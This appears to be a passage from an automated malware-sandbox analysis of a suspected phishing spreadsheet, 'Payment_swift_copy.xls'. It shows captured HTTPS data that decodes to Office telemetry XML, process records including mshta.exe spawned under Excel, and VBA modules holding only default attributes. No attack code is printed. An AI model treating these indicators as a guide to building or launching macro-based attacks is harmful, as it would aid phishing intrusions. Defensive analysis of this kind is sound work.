            2024-12-16 09:07:01 UTC16384INData Raw: 54 3d 22 55 33 32 22 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20
            Data Ascii: T="U32" I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C>
            2024-12-16 09:07:01 UTC16384INData Raw: 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32
            Data Ascii: 1.0" encoding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e2
            2024-12-16 09:07:01 UTC16384INData Raw: 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20
            Data Ascii: ="2" E="TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S>
            2024-12-16 09:07:01 UTC16384INData Raw: 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R>
            2024-12-16 09:07:01 UTC16384INData Raw: 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70
            Data Ascii: </F> <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownExcep
            2024-12-16 09:07:01 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c
            Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:04:05:17
            Start date:16/12/2024
            Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
            Imagebase:0x7ff776930000
            File size:70'082'712 bytes
            MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            General

            Target ID:5
            Start time:04:05:43
            Start date:16/12/2024
            Path:C:\Windows\System32\appidpolicyconverter.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\appidpolicyconverter.exe"
            Imagebase:0x7ff74adc0000
            File size:155'648 bytes
            MD5 hash:6567D9CF2545FAAC60974D9D682700D4
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            General

            Target ID:6
            Start time:04:05:43
            Start date:16/12/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7c7360000
            File size:1'040'384 bytes
            MD5 hash:9698384842DA735D80D278A427A229AB
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            General

            Target ID:16
            Start time:04:06:21
            Start date:16/12/2024
            Path:C:\Windows\System32\mshta.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\mshta.exe -Embedding
            Imagebase:0x7ff727390000
            File size:32'768 bytes
            MD5 hash:36D15DDE6D71802D9588CC0D48EDF8EA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            General

            Target ID:17
            Start time:04:06:25
            Start date:16/12/2024
            Path:C:\Windows\splwow64.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\splwow64.exe 12288
            Imagebase:0x7ff708d60000
            File size:192'512 bytes
            MD5 hash:AF4A7EBF6114EE9E6FBCC910EC3C96E6
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            General

            Target ID:30
            Start time:04:06:53
            Start date:16/12/2024
            Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Payment_swift_copy.xls"
            Imagebase:0x7ff776930000
            File size:70'082'712 bytes
            MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Disassembly

            Code Analysis

            Call Graph

            • Entrypoint
            • Decryption Function
            • Executed
            • Not Executed
            • Show Help
            callgraph 1 Error: Graph is empty

            Module: Sheet1

            Declaration
            LineContent
            1

            Attribute VB_Name = "Sheet1"

            2

            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

            3

            Attribute VB_GlobalNameSpace = False

            4

            Attribute VB_Creatable = False

            5

            Attribute VB_PredeclaredId = True

            6

            Attribute VB_Exposed = True

            7

            Attribute VB_TemplateDerived = False

            8

            Attribute VB_Customizable = True

            Module: Sheet2

            Declaration
            LineContent
            1

            Attribute VB_Name = "Sheet2"

            2

            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

            3

            Attribute VB_GlobalNameSpace = False

            4

            Attribute VB_Creatable = False

            5

            Attribute VB_PredeclaredId = True

            6

            Attribute VB_Exposed = True

            7

            Attribute VB_TemplateDerived = False

            8

            Attribute VB_Customizable = True

            Module: ThisWorkbook

            Declaration
            LineContent
            1

            Attribute VB_Name = "ThisWorkbook"

            2

            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

            3

            Attribute VB_GlobalNameSpace = False

            4

            Attribute VB_Creatable = False

            5

            Attribute VB_PredeclaredId = True

            6

            Attribute VB_Exposed = True

            7

            Attribute VB_TemplateDerived = False

            8

            Attribute VB_Customizable = True

            Reset < >